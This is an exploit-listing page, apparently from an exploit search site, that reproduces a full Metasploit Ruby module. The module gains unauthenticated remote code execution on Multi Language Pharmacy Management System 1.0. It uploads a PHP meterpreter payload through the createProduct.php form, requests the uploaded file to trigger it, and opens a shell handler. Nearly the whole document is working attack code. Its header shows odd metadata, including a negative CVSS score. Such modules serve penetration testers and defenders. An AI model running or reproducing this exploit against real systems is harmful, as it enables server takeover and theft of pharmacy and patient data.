Exploit for Multi Language Pharmacy Management System 1.0 Shell Upload

Name: Exploit for Multi Language Pharmacy Management System 1.0 Shell Upload
Rating: 5 (196 reviews)
2022-06-20 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:167526
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
# Vendor: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download  
# Source: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Multi Language Pharmacy Management System Unauthenticated Remote Code Execution",  
'Description' => %q{  
This module exploits the file upload vulnerability of Multi Language Pharmacy Management System and allows remote code execution.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Emirhan Kurt <emirhan@prodaft.com>' # author & msf module  
],  
'References' =>  
[  
['URL', 'https://prodaft.com']  
],  
'DefaultOptions' =>  
{  
'SSL' => false,  
'WfsDelay' => 5,  
},  
'Platform' => ['php'],  
'Arch' => [ ARCH_PHP],  
'Targets' =>  
[  
['PHP payload',  
{  
'Platform' => 'PHP',  
'Arch' => ARCH_PHP,  
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}  
}  
]  
],  
'Privileged' => false,  
'DisclosureDate' => "Dec 19 2018",  
'DefaultTarget' => 0  
))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The TARGET URI of the Pharmacy Management', '/'])  
]  
)  
end  
  
def exploit  
  
print_status('Uploading shell...')  
  
fname = rand_text_alphanumeric(rand(10) + 6) + '.php'  
  
boundary = "---------------------------#{rand_text_numeric(29)}"  
data_post = "--#{boundary}\r\n"  
data_post << "Content-Disposition: form-data; name=\"currnt_date\""  
data_post << "\r\n\r\n"  
data_post << "\r\n"  
data_post << "--#{boundary}\r\n"  
data_post << "Content-Disposition: form-data; name=\"Medicine\"; filename=\"#{fname}\"\r\n"  
data_post << "Content-Type: application/x-php\r\n"  
data_post << "\r\n#{payload.encoded}\r\n"  
data_post << "--#{boundary}\r\n"  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path,'php_action/createProduct.php'),  
'ctype' => "multipart/form-data; boundary=#{boundary}",  
'data' => data_post,  
})  
  
if res && res.code == 302 && res.body.include?('Image uploaded successfully')  
print_good("Shell uploaded as #{fname}")  
else  
print_error("Server responded with code #{res.code}")  
print_error("Failed to upload shell")  
return false  
end  
  
print_status('Executing payload...')  
send_request_cgi({  
'uri' => normalize_uri(target_uri.path,'assets/myimages/'+fname),  
'method' => 'GET'  
}, 5)  
  
if res  
print_good("Payload successfully triggered !")  
else  
print_error("Server responded with code #{res.code}")  
print_error("Failed to upload shell")  
return false  
end  
  
handler  
  
end  
end